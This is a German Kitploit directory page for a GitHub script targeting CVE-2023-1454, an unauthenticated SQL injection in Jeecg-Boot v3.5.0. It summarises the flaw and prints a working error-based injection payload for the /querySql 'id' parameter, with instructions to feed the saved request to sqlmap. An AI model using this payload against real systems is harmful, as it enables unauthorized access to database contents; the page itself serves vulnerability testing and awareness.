Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-1454 — CVE-2023-1454-Schwachstellenerkennungsskript | Kitploit
Tools/GitHubGitHub/bugfor-pings/cve-2023-1454
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubbugfor-pings/cve-2023-1454

CVE-2023-1454

CVE-2023-1454-Schwachstellenerkennungsskript

Repository anzeigen
1vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-1454

CVE-2023-1454 Schwachstellen-Erkennungsskript

Dieser Artikel dient nur zu Informationszwecken. Verwenden Sie die technischen Informationen und Werkzeuge in diesem Artikel nicht ohne Autorisierung, um Eindringversuche in Computersysteme durchzuführen. Für direkte oder indirekte Konsequenzen und Schäden, die durch die Nutzung der hier bereitgestellten Informationen entstehen, ist allein der Benutzer verantwortlich.

Einführung Jeecg-Boot ist eine Low-Code-Entwicklungsplattform auf Basis von Codegeneratoren. Sie bietet eine Reihe von Funktionen wie Codegeneratoren, Template-Engines, Berechtigungsverwaltung, Datenwörterbücher, Datenimport und -export und hilft Entwicklern, schnell Unternehmensanwendungen zu erstellen.

Schwachstellenübersicht Die Java-Low-Code-Plattform Jeecg-Boot (v3.5.0) für Webanwendungen verwendet die Datei jimureport-spring-boot-starter-1.5.6.jar. Jeecg-Boot weist einen Mangel in der Filterung von Sonderzeichen auf. Unter der Bedingung des Frontends Vue3 in Version v3.5.0 besteht in Jeecg eine nicht autorisierte SQL-Injection. Die Schwachstelle tritt auf, wenn der Pfad /querySql aufgerufen wird und die SQL beim Parameter id nicht bereinigt wird, wodurch eine direkte Fehlerinjektion möglich ist. Ein nicht authentifizierter entfernter Angreifer kann durch die Konstruktion spezieller Zeichenfolgen letztlich sensible Informationen aus der Zieldatenbank abrufen.

Betroffene Versionen Betroffene Version: Jeecg-Boot = v3.5.0

Speichern Sie das Datenpaket als txt, um die Daten mit sqlmap zu erhalten

root@kitploit:~
    Host: xxx.xxx.xxx
    Content-Length: 0
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    
   {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

Tool herunterladen